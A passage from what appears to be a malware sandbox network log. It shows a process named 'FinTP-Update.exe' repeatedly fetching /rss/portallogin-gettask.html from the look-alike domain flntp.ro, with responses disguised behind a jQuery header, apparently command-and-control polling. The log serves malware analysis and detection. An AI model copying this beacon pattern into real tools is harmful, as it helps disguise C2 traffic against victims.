                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:33 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:33 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:33 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.2.5499113.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:35 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:36 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:35 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:36 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.2.5499173.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:37 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:38 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:38 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:38 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.2.5499233.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:39 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:40 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:40 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:40 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            39192.168.2.5499293.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:42 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:42 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:42 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:42 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.2.5499353.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:44 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:44 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:44 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:44 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.2.5499413.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:46 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:47 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:46 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:47 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.5499473.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:48 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:49 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:49 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:49 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.2.5499533.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:50 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:51 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:51 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:51 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.2.5499593.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:53 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:53 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:53 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:53 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.2.5499653.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:55 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
